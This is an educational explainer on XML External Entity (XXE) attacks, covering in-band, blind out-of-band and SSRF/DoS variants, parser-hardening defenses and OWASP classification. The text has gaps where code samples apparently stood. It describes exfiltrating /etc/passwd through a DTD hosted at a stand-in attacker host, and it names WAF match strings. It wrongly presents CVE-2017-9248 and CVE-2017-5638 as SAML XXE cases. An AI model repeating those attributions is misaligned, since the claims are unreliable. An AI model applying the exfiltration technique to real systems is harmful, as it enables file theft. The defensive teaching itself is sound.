What XML actually does
An XML document can declare its own internal abbreviations — entities. The famous ones are <, &, >. You can declare your own too:
Useful. What makes it dangerous is the external variant — entities that reference a URL or file path. The parser fetches the target and substitutes the result inline.
The application then echoes the parsed document back somewhere — into an error message, a converted PDF, a generated thumbnail, a debug log. The attacker has read a server file through a feature that was never supposed to be a vulnerability.
Three variants
In-band (classic)
The parsed document is echoed back in the response. Attacker reads /etc/passwd and sees it returned in the API response or rendered PDF. Easiest to exploit; loudest in logs.
Blind (out-of-band)
No echo, but the parser still resolves external entities. Attacker hosts a malicious DTD that exfiltrates the file contents via an HTTP request to an attacker-controlled server. Slower, but still total compromise.
SSRF / DoS variant
External entity points at internal-only URLs (cloud metadata, internal admin panels, intranet). Or uses the billion-laughs entity expansion attack to consume memory until the parser dies.
Anatomy of an attack
The app accepts an XML upload — an invoice, a SAML assertion, an Office document, an SVG. The user controls the XML payload. The parser is configured with defaults from 2005.
The blind variant — out-of-band exfiltration
The application doesn't echo the parsed value. Doesn't matter. Attacker hosts http://attacker.com/evil.dtd with a parameter entity that does the work:
The parser fetches evil.dtd, which makes it read /etc/passwd and embed it in a new entity that points at the attacker's logger. The contents arrive in the attacker's web logs as a query parameter. No response from the vulnerable app needed.
Defenses
Disable external entities — the only real fix
Every major XML parser has a flag for this. Set it.
Other layers
- Prefer JSON. Most modern APIs don't need XML at all. If you can refuse XML uploads, refuse them.
- WAF rules can catch
<!ENTITYandSYSTEMin request bodies, but parser config is the real fix — the WAF is a tripwire, not a wall. - Watch for SAML and Office docs. Both are XML under the hood. SAML responses, in particular, were a major XXE vector for years — CVE-2017-9248 (Telerik), CVE-2017-5638 (Apache Struts S2-045) and many others.
- Sandbox the parsing process. No outbound network. Read-only access to a minimal filesystem. If the parser is compromised, the blast radius is small.
The takeaway
XXE is the cleanest example of a feature that became a vulnerability. Nobody using an XML invoice API in 2025 wants their parser to fetch external URLs. But the XML 1.0 spec from 1998 enabled it, parsers shipped with it on, and twenty years later the bug is still found in fresh code. Disable external entities in every XML parser you initialize. Prefer JSON for new APIs. Treat XML upload endpoints as high-value defensive targets.
OWASP standing
XXE had its own slot in the OWASP Top 10 (2017): A4 — XML External Entities. In the 2021 refresh, OWASP folded XXE into the broader A05:2021 Security Misconfiguration and A04:2021 Insecure Design categories. The bug class hasn't gone away — it's just classified differently.
What to remember
- XML parsers have a "fetch arbitrary URLs" feature on by default. Most code doesn't need it. Turn it off.
- The attack surface is wherever XML is parsed: SOAP endpoints, SAML assertions, SVG uploads, DOCX/XLSX/PPTX (zip + XML), config files, RSS feeds, OPML imports, XML-RPC.
- The damage is read-file, SSRF, DoS, and occasionally RCE via interaction with other parsers (the PHP
expect://wrapper, for example). - defusedxml in Python, settings flags in Java/.NET/PHP, libxml prohibitions everywhere else. The fix is a few lines.
- Modernize. If the API can speak JSON, retire the XML endpoint. Bug class extinguished.
References
Formatted in APA 7.
- OWASP. (2017). A4:2017 — XML External Entities (XXE). OWASP Top 10. https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)
- OWASP. (2024). XML External Entity (XXE) prevention cheat sheet. OWASP Cheat Sheet Series. https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- Python Software Foundation. (2024). XML vulnerabilities — defusedxml documentation. https://docs.python.org/3/library/xml.html#xml-vulnerabilities
- MITRE. (2024). CWE-611: Improper restriction of XML external entity reference. Common Weakness Enumeration. https://cwe.mitre.org/data/definitions/611.html